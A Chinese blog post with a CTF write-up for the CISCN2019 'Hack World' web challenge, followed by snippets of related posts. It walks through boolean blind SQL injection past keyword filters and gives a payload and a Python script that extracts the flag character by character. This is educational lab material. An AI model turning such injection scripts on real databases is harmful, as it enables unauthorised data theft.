首页 > 其他分享 >[CISCN2019 华北赛区 Day2 Web1]Hack World

[CISCN2019 华北赛区 Day2 Web1]Hack World

时间:2024-11-10 22:30:38浏览次数:6  
标签:letf Day2 flag Web1 Hack World

题目链接:[CISCN2019 华北赛区 Day2 Web1]Hack World

打开环境后如下所示。

尝试输入 1、2、3、4、...,发现仅存在三种结果。

即 1 时,输出 "Hello, glzjin wants a girlfriend."。

2 时,输出 "Do you want to be my girlfriend?"。

其他,输出 "Error Occured When Fetch Result."。

且存在对用户输入的检测。

还有个意义不明的信息。

通过 fuzzing,可以发现后端对什么关键词进行了检测。

因此,这里使用布尔盲注进行读取数据(题目中存在提示,只需要读取 flag 表中的 flag 字段)。

Payload:if(ascii(substr((select(database())),1,1))>99,1,2)

# 二分法
import requests

url = "http://75073420-9c74-41e5-b9fb-6bfe86d0efc8.node5.buuoj.cn:81/index.php"
flag = ""
i = 0

while True:
    i = i + 1
    letf = 32
    right = 127
    while letf < right:
        mid = (letf+right) // 2
        payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"
        data = {"id":payload} 
        res = requests.post(url=url, data=data).text
        if "Hello" in res:
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        flag += chr(letf)
        print(flag)
    else:
        break

参考:

标签:letf,Day2,flag,Web1,Hack,World
From: https://www.cnblogs.com/imtaieee/p/18538661

相关文章

  • [CISCN2019 华北赛区 Day2 Web1]Hack World 1
    [CISCN2019华北赛区Day2Web1]HackWorld1打开实例发现是个POST注入框盲猜SQL注入,万能密码检测无果,而且经过测试存在大量sql关键字过滤尝试使用(),出现了bool(false),确定这是一道布尔注入题and被禁用,决定采用异或^注入构建payload脚本梭哈:成功获得flag:flag{a2f7089......
  • 11.9 javaweb学习 day2 基础标签&样式
    网页响应流程浏览器前端服务器后端服务器数据库1.浏览器请求前端2.前端响应浏览器3.浏览器请求后端4.后端请求数据库5.数据库响应后端6.后端响应浏览器网页的组成1.网页的文字,图片,音频,视频,超链接什么的,本质是前端代码2.前端代码通过浏览器的转化......
  • The World is a Theatre
    TA.TheWorldisaTheatreTherearenboysandmgirlsattendingatheatreclub.Tosetaplay“TheBigBangTheory”,theyneedtochooseagroupcontainingexactlytactorscontainingnolessthan4boysandnolessthanonegirl.Howmanywaysare......
  • day20-21之间的项目实战:若依ruoyi开发(可以跳过)
    一,项目概述官网文档地址:http://doc.ruoyi.vip/rouyi是一个后台管理系统,基于经典技术组合(springboot,apacheshiro,mybatis,thymeleaf)主要是让开发者注重专注业务,降低技术难度,从而节省人力成本,缩短项目周期,提高软件安全质量。系统要求JDK>=1.8myslq>=5.7maven>=3.8二,开发环......
  • 26文科跨考北大软微刷题日记-DAY2
    昨天学校期中考试,今天更新。完成进度:1.语法基础课第二讲(if条件)课后习题已做完2.打算今晚再看一下408数据结构的6.3_1图的广度优先遍历和6.3_2图的深度优先遍历做题总结:1.如何描述“一个数是另一个数的整数倍”if(a%b==0)2.若出现像python中的字典样式的,如何通过不用......
  • My_SQL day2
    知识点一:mysq查询方法    排序    限制    去重    模糊查询    范围查询    聚合函数    分组知识点二:连接查询    1.内连接    2.外连接知识点一:mysql查询方法isnull      ......
  • AI人工智能学习-Day2
    人工智能应用范畴脑科学认知科学心理学语言学逻辑学哲学计算机科学人工智能包含领域机器学习MachineLearning数据挖掘Databases模式识别神经计算NeurocompatingAI、机器学习、深度学习的关系人工智能包含机器学习,机器......
  • 初学Java基础---Day21---正则表达式,日期类,Math类,Random类,System类,Runtime类,大数值运
    一,正则表达式理解:        符合某个语句规范的字符串案例://案例:把一个字符串中带电话号码替换成130****1111的形式Stringstr="小红13012341111小绿15112342222小黑13912343333";//分析:电话号码可以分为三组如:(130)(1234)(1111)其中第一组中的1是固定/......
  • day2
    质量模型功能性:与需求量一致,功能正确性能:响应快,资源占比少(优化)兼容性:不同设备不同平台上能正常使用易用性:流畅,简洁,美观(用户体验好)安全性:敏感数据存储/传输安全可靠性:长时间运行稳定,不出现异常可移植性:应用系统升级/数据迁移方便可维护性:方便维护1.单功能测试是指软件程......
  • 代码随想录一刷day6 (链表day2)(链表完结)
    24.两两交换链表中的节点分三步走;1.创建dummyhead2.三个指针 cur  t1 t23.  cur->next=t2;  t1->next=t2->next;  t2->t1->next; 最后让cur=t1;注意最后返回的是dummyhead-》next 而不是head;注意最后deletedummyhead19.删除链表的倒数第N个节点注......